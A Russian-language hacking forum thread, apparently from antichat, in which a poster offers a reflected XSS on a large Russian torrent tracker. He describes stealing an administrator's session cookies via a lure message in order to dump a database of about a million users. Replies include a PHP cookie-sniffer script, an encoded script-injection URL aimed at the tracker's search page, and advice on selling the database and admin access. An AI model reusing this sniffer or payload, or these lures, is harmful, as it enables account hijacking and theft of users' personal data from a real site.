Пассивная XSS в крупнейшем Российском трекере (не торрентс)

За подробностями 643~770
---------------------------------------------------------------------------
Возможность слить БД (~1000000 пользователей) и получить доступ к Админ-Панели!

Возможность слить БД

как ты через xxs бд будешь сливать?)

.Striker
Ну давай подумаем:

1. Получаем куки админа
2. Сразу идём в админку
3. Резервная копия БД
4. Начать копирование

Так более яснее ?

ты сначала получи куки и без палева слей её если получится :)
а потом отпиши

если сайт крупный, то думаю тама за всем пасут

Доступ в админ панель я получал.
Банальное сообщение: "У вас тут плохо сайт работает"
Куки у меня и я админ!
-------------------------------------------------------------------

Сейчас снифер античатовский прост не работает))
У кого есть альтернативный, пишите, наделаю скринов бд, сайта и админки


если сайт крупный, то думаю тама за всем пасут

XSS я обнаружил ~2 недели назад, ещё актуальна и закрывать повидимому не собираются

З.Ы. Плиз без флуда ( =

сниффер
<?php
$ip = getenv("REMOTE_ADDR");
$rhost = getenv("HTTP_REFERER");
$input = getenv("QUERY_STRING");
$date=(date("d.m.y"));
$time=(date("H:i"));
$fp = @fopen("snif.txt", "a");
@fputs($fp, "Дата: [ $date ] Время: [ $time ] IP: $ip Хост: $rhost Инфа $input \n");
@fclose($fp);
?>

Доступ в админ панель я получал.
Банальное сообщение: "У вас тут плохо сайт работает"
Куки у меня и я админ!
-------------------------------------------------------------------

Сейчас снифер античатовский прост не работает))
У кого есть альтернативный, пишите, наделаю скринов бд, сайта и админки



XSS я обнаружил ~2 недели назад, ещё актуальна и закрывать повидимому не собираются

З.Ы. Плиз без флуда ( =
Чем не устроил сниффер от GreenBear?

Продавал бы тогда уж сразу бд

Чем не устроил сниффер от GreenBear?

Я его (http://forum.antichat.ru/thread36829.html) и имел ввиду (XSS тестировалась именно на нём) {он сейчас не работает(}

Продавал бы тогда уж сразу бд

Что-то не хочется мне торговать БД ( =
-----------------------------------------------

Все предложения по поводу XSS в ПМ или ICQ

XSS в сообщении, выглядит так: http://ipicture.ru/uploads/080717/3WqCBZY7Lf.jpg

в крупнейшем Российском трекере (не торрентс)
Ссыль на сам трекер трудно было выложить?

geforse, если серьезно, то молодец, советую БД отдельно продать в одни руки, и админку в другие! ;)
и XSS в другие)))
всего 3 чела, а цена будет стоить своего!:)

Ссыль на сам трекер трудно было выложить?

XSS могут найти и прикрыть! :D

Сори чувак, но найти ее было очень просто ..

NjggNzQgNzQgNzAgM2EgMmYgMmYgNzQgNjYgNjkgNmMgNjUgMm UgNzIgNzUgMmYgMGQgMGEgYzIgZjEgZTUgZTMgZWUgMjAgZTcg ZTAgZjAgZTUgZTMgZTggZjEgZjIgZjAgZTggZjAgZWUgZTIgZT AgZWQgZWQgZmIgZjUgMjAgZWYgZWUgZWIgZmMgZTcgZWUgZTIg ZTAgZjIgZTUgZWIgZTUgZTkgM2EgMjAgNWIgNDIgNWQgMzEgMz IgMzAgMzAgMzggMzMgMzIgNWIgMmYgNDIgNWQgMGQgMGEgMGQg MGEgNjggNzQgNzQgNzAgM2EgMmYgMmYgNzQgNjYgNjkgNmMgNj UgMmUgNzIgNzUgMmYgNjYgNmYgNzIgNzUgNmQgMmYgNzMgNzMg NjUgNjEgNzIgNjMgNjggMmUgNzAgNjggNzAgM2YgNzEgM2QgMj IgM2UgM2MgNzMgNjMgNzIgNjkgNzAgNzQgM2UgNjEgNmMgNjUg NzIgNzQgMjggMjIgNDIgNmMgNjEgNjMgNmIgNTMgNzUgNmUgMj IgMjkgM2IgM2MgMmYgNzMgNjMgNzIgNjkgNzAgNzQgM2UgMjYg NjYgM2QgMzEgMzcgMjYgNjcgM2QgMjYgNzEgNmMgM2QgMzAgMj YgNjEgM2QgMjYgNjQgM2QgMjYgNjkgNmYgM2QgMzEgMjYgNmYg M2QgMjYgNjMgNzAgM2QgMzEgMjYgNzMgNmMgNzQgM2QgMzAgMj YgNzMgNjcgNzQgM2QgMzA=
кому надо, расшифруют

BlackSun АХАХАХАХАХ ТРУ ХАКЕР)!)
ПРЯМ ОБЛОМЩЕК :D

да уж =) щя все админа заспамят

ОГРОМНОЕ СПАСИБО, ПОЛЬЗОВАТЕЛИ АЧЧАТА

ТОЛЬКО НАСТОЯЩИЕ КУЛХАЦКЕРЫ ТАК МОГЛИ ПОСТУПИТЬ....я всегда считал, что тут люди помогают друг другу, а НЕ ГАДЯТ....ещё раз всем спасибо

бугага)) ор

Паццтолом!))

это жестоко - но так бывает ..

и чо?

BlackSun, респект ;) Жаль в репутацию поставить не могу + :)

А за сколько продать хотел? Не растраивайся, продай акк админа!

надо было самому БД сливать...

не расстраивайся
нашел одну найдешь и вторую и третью...
с одной стороны BlackSun молодец, красавец и тд и тп...
а с другой стороны ну ни хорошо так делать
моя точка зрения что BlackSun поступил не правельно

Щяс с Админом Торрентс ру говорил, он первый с кем я в инете познакомился :)
Карочи говоря если ты даже сесию админа спиздиш бд у тебя не будет ;)

^^

ОГРОМНОЕ СПАСИБО, ПОЛЬЗОВАТЕЛИ АЧЧАТА

ТОЛЬКО НАСТОЯЩИЕ КУЛХАЦКЕРЫ ТАК МОГЛИ ПОСТУПИТЬ....я всегда считал, что тут люди помогают друг другу, а НЕ ГАДЯТ....ещё раз всем спасибо

ТС ты пытался впарить боян?
http://forum.antichat.ru/showpost.php?p=750920&postcount=1948

У него типа в ssearch.php

Тока там же пых-пых Б..Б..

Какая админка млин? без пароля админа. Это явное полоскание мозгов.

Если получить куки админа, который только что побывал в админке, доступ в в админ панель гарантирован.
Просто письмо: Cмените мне ник, я вам дам 5wmz и админ в админке, а куки мои.

ТС ты пытался впарить боян?
http://forum.antichat.ru/showpost.php?p=750920&postcount=1948

Там в index.php, у меня в другом...

А не тут - http://tfile.ru/forum/ssearch.php случайно ? :)